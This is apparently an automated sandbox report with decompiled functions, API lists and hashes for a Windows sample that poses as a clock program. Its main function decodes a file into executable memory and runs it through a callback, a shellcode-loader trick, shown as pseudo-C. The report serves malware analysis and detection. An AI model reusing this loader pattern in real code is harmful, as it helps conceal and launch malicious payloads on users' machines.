Function 012C1330 Relevance: 42.1, APIs: 22, Strings: 2, Instructions: 142
windowfileregistryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E012C1330(struct HWND__* __eax, intOrPtr _a8) {
				long _v8;
				void* _v12;
				long _v16;
				struct tagMSG _v44;
				struct _WNDCLASSW _v84;
				void* _t18;
				long _t23;
				struct HMENU__* _t38;
				_Unknown_base(*)()* _t53;
				struct _OVERLAPPED* _t55;
				void* _t57;

				_t55 = 0;
				__imp__GetConsoleWindow();
				ShowWindow(__eax, 0);
				_t18 = malloc(0x3d0900);
				_v12 = _t18;
				if(_t18 != 0) {
					memset(_t18, 0x54, 0x3d0900);
					_t57 = CreateFileW( *(_a8 + 4), 0x80000000, 1, 0, 3, 0x80, 0);
					_t23 = GetFileSize(_t57, 0);
					_v8 = _t23;
					_t53 = VirtualAlloc(0, _t23, 0x3000, 0x40);
					ReadFile(_t57, _t53, _v8,  &_v16, 0);
					do {
						 *((char*)(_t53 + _t55)) = (( *((intOrPtr*)(_t53 + _t55)) - 0x00000061 ^ 0x0000005e) + 0x0000002b ^ 0x000000a8) + 0x24;
						_t55 =  &(_t55->Internal);
					} while (_t55 < _v8);
					EnumSystemCodePagesW(_t53, 0);
					free(_v12);
					L012C1539();
					 *0x12c30bc = 0;
					 *0x12c30cc = 1;
					 *0x12c30d8 = 1;
					if(RegisterClassW( &_v84) != 0) {
						 *0x12c30e4 = 0xc8;
						 *0x12c30e0 = 0xc8;
						 *0x12c30c4 = CreateWindowExW(0, L"CLClass", L"Clock", 0xcf0000, 0x80000000, 0x80000000, 0xc8, 0xc8, 0, 0, 0, 0);
						if(E012C1130() != 0) {
							_t38 = LoadMenuW(0, 0x100);
							 *0x12c30c8 = _t38;
							SetMenu( *0x12c30c4, _t38);
							E012C11D0();
							E012C1290();
							UpdateWindow( *0x12c30c4);
							while(GetMessageW( &_v44, 0, 0, 0) != 0) {
								TranslateMessage( &_v44);
								DispatchMessageW( &_v44);
							}
							KillTimer( *0x12c30c4, 1);
							DeleteObject( *0x12c30bc);
						}
					}
				}
				return 0;
			}

0x012c1339
0x012c133c
0x012c1343
0x012c134e
0x012c1356
0x012c135b
0x012c1369
0x012c138d
0x012c1391
0x012c13a0
0x012c13aa
0x012c13b5
0x012c13c0
0x012c13cd
0x012c13d0
0x012c13d1
0x012c13d9
0x012c13e2
0x012c13ea
0x012c13f2
0x012c13fd
0x012c1407
0x012c141a
0x012c144d
0x012c1457
0x012c1467
0x012c1473
0x012c1480
0x012c148d
0x012c1492
0x012c1498
0x012c149d
0x012c14a8
0x012c14c2
0x012c14d4
0x012c14da
0x012c14e8
0x012c14f4
0x012c1500
0x012c1500
0x012c1473
0x012c141a
0x012c150e

APIs

GetConsoleWindow.KERNEL32(00000000), ref: 012C133C
ShowWindow.USER32(00000000), ref: 012C1343
malloc.MSVCRT ref: 012C134E
memset.MSVCRT ref: 012C1369
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 012C1387
GetFileSize.KERNEL32(00000000,00000000), ref: 012C1391
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 012C13A3
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 012C13B5
EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 012C13D9
free.MSVCRT(?), ref: 012C13E2
#17.COMCTL32 ref: 012C13EA
RegisterClassW.USER32 ref: 012C1411
CreateWindowExW.USER32 ref: 012C1461
LoadMenuW.USER32 ref: 012C1480
SetMenu.USER32(00000000), ref: 012C1492
UpdateWindow.USER32 ref: 012C14A8
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 012C14BE
TranslateMessage.USER32(?), ref: 012C14D4
DispatchMessageW.USER32 ref: 012C14DA
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 012C14E6
KillTimer.USER32(00000001), ref: 012C14F4
DeleteObject.GDI32 ref: 012C1500

Strings

Clock, xrefs: 012C1441
CLClass, xrefs: 012C1446

Memory Dump Source

Source File: 00000003.00000002.397297389.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000003.00000002.397284990.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397320051.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397331789.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12c0000_idxgunu.jbxd

Similarity

API ID: MessageWindow$File$CreateMenu$AllocClassCodeConsoleDeleteDispatchEnumKillLoadObjectPagesReadRegisterShowSizeSystemTimerTranslateUpdateVirtualfreemallocmemset
String ID: CLClass$Clock
API String ID: 4172311262-801714703
Opcode ID: 7e4464aec2fa185386ad60fe55fed5716907ebf71803f7a82f2d5eebe90f6213
Instruction ID: de4dfac79bc2b23223790d66267f1f20647ec3cef26ff2565c1fbd967a76db1c
Opcode Fuzzy Hash: 7e4464aec2fa185386ad60fe55fed5716907ebf71803f7a82f2d5eebe90f6213
Instruction Fuzzy Hash: AB41DD71A40205FFEB31ABA0BC0EF9A7B79FB64B40F10411AF705A61C5DEB0A014CB24

Uniqueness

Uniqueness Score: -1.00%

Function 012C1000 Relevance: 15.1, APIs: 10, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 55%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				int _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				struct HWND__* _t28;
				int _t29;
				intOrPtr* _t30;
				intOrPtr _t37;
				intOrPtr _t45;

				_push(0xffffffff);
				_push(0x12c21d8);
				_push(0x12c152d);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t45;
				_v28 = _t45 - 0x20;
				_v8 = _v8 & 0x00000000;
				__set_app_type(1);
				 *0x12c30e8 =  *0x12c30e8 | 0xffffffff;
				 *0x12c30ec =  *0x12c30ec | 0xffffffff;
				 *(__p__fmode()) =  *0x12c305c;
				 *(__p__commode()) =  *0x12c3058;
				 *0x12c30f0 = _adjust_fdiv;
				E012C1125( *_adjust_fdiv);
				if( *0x12c3010 == 0) {
					__setusermatherr(E012C1122);
				}
				E012C1110();
				L012C1527();
				_v44 =  *0x12c3054;
				_t28 =  &_v32;
				__imp____wgetmainargs(_t28,  &_v48,  &_v36,  *0x12c3050,  &_v44, 0x12c3008, 0x12c300c);
				L012C1527();
				__imp____p___winitenv(0x12c3000, 0x12c3004);
				 *_t28 = _v36;
				_push(_v36);
				_t29 = E012C1330(_t28, _v32, _v48);
				_v40 = _t29;
				exit(_t29);
				_t30 = _v24;
				_t37 =  *((intOrPtr*)( *_t30));
				_v52 = _t37;
				_push(_t30);
				_push(_t37);
				L012C1521();
				return _t30;
			}

APIs

__set_app_type.MSVCRT ref: 012C102C
__p__fmode.MSVCRT ref: 012C1041
__p__commode.MSVCRT ref: 012C104F
__setusermatherr.MSVCRT ref: 012C107C
_initterm.MSVCRT ref: 012C1092
__wgetmainargs.MSVCRT ref: 012C10B5
_initterm.MSVCRT ref: 012C10C5
__p___winitenv.MSVCRT ref: 012C10CA
exit.MSVCRT ref: 012C10EA
_XcptFilter.MSVCRT ref: 012C10FC

Memory Dump Source

Source File: 00000003.00000002.397297389.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000003.00000002.397284990.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397320051.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397331789.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12c0000_idxgunu.jbxd

Similarity

API ID: _initterm$FilterXcpt__p___winitenv__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargsexit
String ID:
API String ID: 1779410220-0
Opcode ID: c3c9a83fc360964074bb0ccf8db1abda57efa3064a6567d59457aed35dd8c16b
Instruction ID: 170248a3e74e54f75fb06a7ecd64e644de4922edb065e1657add04246b1a6494
Opcode Fuzzy Hash: c3c9a83fc360964074bb0ccf8db1abda57efa3064a6567d59457aed35dd8c16b
Instruction Fuzzy Hash: AD314D76910205EFCB24DFA4F84AAAD7BB9FB19B20F10461EE712A3294CB759414CF64

Uniqueness

Uniqueness Score: -1.00%

Function 012C11D0 Relevance: 12.1, APIs: 8, Instructions: 63
windowCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E012C11D0() {
				struct HMENU__* _t1;
				struct HMENU__* _t21;

				_t1 = GetSubMenu( *0x12c30c8, 0);
				_t21 = _t1;
				if(_t21 != 0) {
					_push(8);
					if( *0x12c30cc == 0) {
						CheckMenuRadioItem(_t21, 0x101, 0x102, 0x102, ??);
						_push(0);
					} else {
						CheckMenuRadioItem(_t21, 0x101, 0x102, 0x101, ??);
						_push(1);
					}
					EnableMenuItem(_t21, 0x103, ??);
					asm("sbb eax, eax");
					CheckMenuItem(_t21, 0x104,  ~( *0x12c30d4) & 0x00000008);
					asm("sbb eax, eax");
					CheckMenuItem(_t21, 0x113,  ~( *0x12c30d0) & 0x00000008);
					asm("sbb eax, eax");
					CheckMenuItem(_t21, 0x105,  ~( *0x12c30d8) & 0x00000008);
					asm("sbb eax, eax");
					return CheckMenuItem(_t21, 0x106,  ~( *0x12c30dc) & 0x00000008);
				}
				return _t1;
			}

APIs

GetSubMenu.USER32 ref: 012C11D9
CheckMenuRadioItem.USER32 ref: 012C1204
CheckMenuRadioItem.USER32 ref: 012C121E
EnableMenuItem.USER32 ref: 012C122C
CheckMenuItem.USER32(00000000,00000104,?), ref: 012C124C
CheckMenuItem.USER32(00000000,00000113,?), ref: 012C1261
CheckMenuItem.USER32(00000000,00000105,?), ref: 012C1276
CheckMenuItem.USER32(00000000,00000106,?), ref: 012C128B

Memory Dump Source

Source File: 00000003.00000002.397297389.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000003.00000002.397284990.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397320051.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397331789.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12c0000_idxgunu.jbxd

Similarity

API ID: Menu$Item$Check$Radio$Enable
String ID:
API String ID: 2816281541-0
Opcode ID: 76028d7df57658f2d462ff41fb464982544b8bbc04283a19547b94144826db08
Instruction ID: 4edd25ec45b848f465277f898888f31be2f47b5b0fde5f0bd5c8cdde01ddb3bb
Opcode Fuzzy Hash: 76028d7df57658f2d462ff41fb464982544b8bbc04283a19547b94144826db08
Instruction Fuzzy Hash: D51184363E0211BEE621DA28FC4FFB936A9A795F02F004105FB40E61C5CAEC94814B61

Uniqueness

Uniqueness Score: -1.00%

Function 012C1130 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
timewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012C1130() {
				short _v516;
				int _t4;

				KillTimer( *0x12c30c4, 1);
				if( *0x12c30d8 == 0) {
					_t4 = 0x3e8;
				} else {
					_t4 =  !=  ? 0x32 : 0x1f4;
				}
				if(SetTimer( *0x12c30c4, 1, _t4, 0) != 0) {
					return 1;
				} else {
					LoadStringW( *0x12c30c0, 0x10c,  &_v516, 0xff);
					MessageBoxW(0, L"No available timers",  &_v516, 0x30);
					return 0;
				}
			}

0x012c1141
0x012c114e
0x012c1166
0x012c1150
0x012c1161
0x012c1161
0x012c117e
0x012c11c1
0x012c1180
0x012c1197
0x012c11ad
0x012c11b8
0x012c11b8

APIs

KillTimer.USER32(00000001), ref: 012C1141
SetTimer.USER32(00000001,000003E8,00000000), ref: 012C1176
LoadStringW.USER32(0000010C,?,000000FF), ref: 012C1197
MessageBoxW.USER32(00000000,No available timers,?,00000030), ref: 012C11AD

Strings

No available timers, xrefs: 012C11A6

Memory Dump Source

Source File: 00000003.00000002.397297389.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000003.00000002.397284990.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397320051.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397331789.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12c0000_idxgunu.jbxd

Similarity

API ID: Timer$KillLoadMessageString
String ID: No available timers
API String ID: 1144026915-3294945137
Opcode ID: 3c5bd5aa1c24db96402adeb49e5bec7ab0b2e7dd7488468f47f5530927814bc6
Instruction ID: 4c2aac2d558f32ed3b1c07bb4fe1c163cc9aa775988f0c22c6d7d34e43652215
Opcode Fuzzy Hash: 3c5bd5aa1c24db96402adeb49e5bec7ab0b2e7dd7488468f47f5530927814bc6
Instruction Fuzzy Hash: 07011931390205EFFB31DA18FC4EBA576A9F740B02F000269BB08960C6EAE69955DB56

Uniqueness

Uniqueness Score: -1.00%

Function 012C1290 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E012C1290() {
				short _v516;
				int _t23;
				signed int _t27;
				void* _t29;

				_t27 = 0;
				if( *0x12c30dc != 0) {
					_t23 =  &_v516;
					0x12c0000(_t23);
					_t27 = GetDateFormatW(0x400, 2, 0, 0,  &_v516, _t23);
					if(_t27 != 0) {
						 *((intOrPtr*)(_t29 + _t27 * 2 - 0x202)) = 0x2d0020;
						 *((short*)(_t29 + _t27 * 2 - 0x1fe)) = 0x20;
						_t27 = _t27 + 2;
						 *((short*)(_t29 + _t27 * 2 - 0x200)) = 0;
					}
				}
				LoadStringW(0, 0x10c,  &(( &_v516)[_t27]), 0xff - _t27);
				return SetWindowTextW( *0x12c30c4,  &_v516);
			}

0x012c1293
0x012c12a1
0x012c12a3
0x012c12aa
0x012c12c8
0x012c12cc
0x012c12ce
0x012c12de
0x012c12e6
0x012c12eb
0x012c12eb
0x012c12cc
0x012c130c
0x012c1328

APIs

GetDateFormatW.KERNEL32(00000400,00000002,00000000,00000000,?,00000000), ref: 012C12C2
LoadStringW.USER32(00000000,0000010C,?,000000FF), ref: 012C130C
SetWindowTextW.USER32(?), ref: 012C131F

Strings

, xrefs: 012C12CE

Memory Dump Source

Source File: 00000003.00000002.397297389.00000000012C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012C0000, based on PE: true

Associated: 00000003.00000002.397284990.00000000012C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397320051.00000000012C2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.397331789.00000000012C4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12c0000_idxgunu.jbxd

Similarity

API ID: DateFormatLoadStringTextWindow
String ID:
API String ID: 2404250852-3916222277
Opcode ID: a4d5f5085dafe729c08c5bfb441dbd101b4b03b86dbf79aa2007c10d912793e5
Instruction ID: a8bca086c60c6cca6756353fb7111cd7af327a4a74f1cbadd5364c2e1178289d
Opcode Fuzzy Hash: a4d5f5085dafe729c08c5bfb441dbd101b4b03b86dbf79aa2007c10d912793e5
Instruction Fuzzy Hash: 9701847464030ADEFB249E64EC4EFBA3768FB04701F0041BDAB05D6196EB7059148F51

Uniqueness

Uniqueness Score: -1.00%

Function 0138FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0138FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0133CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01385720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01385720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0138fdda
0x0138fde2
0x0138fde5
0x0138fdec
0x0138fdfa
0x0138fdff
0x0138fe0a
0x0138fe0f
0x0138fe17
0x0138fe1e
0x0138fe19
0x0138fe19
0x0138fe19
0x0138fe20
0x0138fe21
0x0138fe22
0x0138fe25
0x0138fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0138FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0138FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0138FE01

Memory Dump Source

Source File: 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_12d0000_idxgunu.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 9e36ce87c67b1538051b1e63566c8e22a3eceb236215346a2d75439fe35667f4
Instruction ID: bb916078191aab3449a36717cb6ac585adae7b148b9be1869cc6c0a1cf778a16
Opcode Fuzzy Hash: 9e36ce87c67b1538051b1e63566c8e22a3eceb236215346a2d75439fe35667f4
Instruction Fuzzy Hash: 56F0F632200201BFEA202B5ADC06F23BF5EEB44B34F144319F628565D1EA62F87087F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 3216, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	590
Total number of Limit Nodes:	78

Executed Functions

Function 0105A35A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,01054BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01054BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0105A3AD

Strings

.z`, xrefs: 0105A39D, 0105A3A8

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: fb81b79bd054696bd30f7783cbbba64630f45b31e8fdb736c866990eca9df838
Instruction ID: 662af30f0fd1a708c0a28244322e6ac73263f07fb20a105e931a21b156e35b49
Opcode Fuzzy Hash: fb81b79bd054696bd30f7783cbbba64630f45b31e8fdb736c866990eca9df838
Instruction Fuzzy Hash: D901B2B2201208ABCB48CF88DC84EEB77ADAF8C754F158248FA1D97250D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0105A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,01054BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01054BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0105A3AD

Strings

.z`, xrefs: 0105A39D, 0105A3A8

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: e148cd363bf3ece4725b13048e6c21e600a9988a8822c194fb78f674a46cefb0
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: F4F0BDB2200208ABCB48CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0105A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(01054D72,5EB65239,FFFFFFFF,01054A31,?,?,01054D72,?,01054A31,FFFFFFFF,5EB65239,01054D72,?,00000000), ref: 0105A455

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 3a1dec5cf0b8271c246f6d2bdd296f493f32f8b6cd4145edd6538eb775b97e2c
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 6DF0B7B2200208AFCB14DF89DC80EEB77ADEF8C754F158248BE1D97241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0105A40A Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(01054D72,5EB65239,FFFFFFFF,01054A31,?,?,01054D72,?,01054A31,FFFFFFFF,5EB65239,01054D72,?,00000000), ref: 0105A455

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 61e500781e26c8594c36442974150981a9144bc2ab8e147291b1573612d45a7c
Instruction ID: be87f704f8256a219d79c1fd5cba919ab69fa4cce81f2566b4f277772c95105d
Opcode Fuzzy Hash: 61e500781e26c8594c36442974150981a9144bc2ab8e147291b1573612d45a7c
Instruction Fuzzy Hash: 85F01DB2200109AFCB04DF89CC44EEB77ADEF8C314F158249BA1D97251C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0105A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01042D11,00002000,00003000,00000004), ref: 0105A579

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 207030bf5059b1e74d7f820d208ea2f99ed8561793587aafff52a1e411507b0e
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 79F015B2200208ABCB14DF89CC80EEB77ADEF88654F118248BE0897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0105A48C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(01054D50,?,?,01054D50,00000000,FFFFFFFF), ref: 0105A4B5

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4400d7dcc8f692182bd60ffff008f31789dd3a0665ffcaabba4698a3855f5ade
Instruction ID: 9fc56a5c94742ef10a8e87c02cdec352f069a2e860700b6b7106d940ce23136e
Opcode Fuzzy Hash: 4400d7dcc8f692182bd60ffff008f31789dd3a0665ffcaabba4698a3855f5ade
Instruction Fuzzy Hash: 5FE08C75200110ABD710DB94CC84F973729EF44214F148589FE085B241C130E500CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0105A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(01054D50,?,?,01054D50,00000000,FFFFFFFF), ref: 0105A4B5

Memory Dump Source

Source File: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, Offset: 01040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1040000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: f19c7dbc7e2e1009019a10d5689f6b6ad38d651d17498cc795d27cecabd48d56
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 45D01275200214ABD710EBD8CC45ED7775CEF44650F154555BA585B241C530F50087E0

Uniqueness

Uniqueness Score: -1.00%

Function 04FB95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB95DA

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ac93433bc17d856d084c5e10e838f61cb310e5cc2d30ca8133d2eb66c563f49
Instruction ID: 3d4f6e2229d953337c6970aebcf35091c2b7c1a792f0c6172287e771bf078dab
Opcode Fuzzy Hash: 3ac93433bc17d856d084c5e10e838f61cb310e5cc2d30ca8133d2eb66c563f49
Instruction Fuzzy Hash: F69002A1242001036205B159451461A400A97E0245B51C035E10065D0DC565D8927165

Uniqueness

Uniqueness Score: -1.00%

Function 04FB9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB954A

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eeb379c70d4c2328bd58dd8cf3c448a39cd6c08216354c6f2f5ddf5d08a0d42e
Instruction ID: 6a553e6c3f808112175024a479e12ee6583842dd7891b8ed8d6e06485e340ded
Opcode Fuzzy Hash: eeb379c70d4c2328bd58dd8cf3c448a39cd6c08216354c6f2f5ddf5d08a0d42e
Instruction Fuzzy Hash: 4C900265251001032205E559070450B004697D5395351C035F1007590CD661D8626161

Uniqueness

Uniqueness Score: -1.00%

Function 04FB96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FB96EA

Memory Dump Source

Source File: 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: true

Associated: 00000005.00000002.825243435.000000000506B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4f50000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7157eb8cd68ae395cddaa00a04f90d9aca275dc452125fd4ac8fb2db2fe798c8
Instruction ID: a349646626ac003b331f303a8da1a65e196112adc2d1075c4abe335cd6807816
Opcode Fuzzy Hash: 7157eb8cd68ae395cddaa00a04f90d9aca275dc452125fd4ac8fb2db2fe798c8
Instruction Fuzzy Hash: 2990027124108902F210A159850474E000597D0345F55C425A4416698D86D5D8927161

Uniqueness

Uniqueness Score: -1.00%

Function 04FB96D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

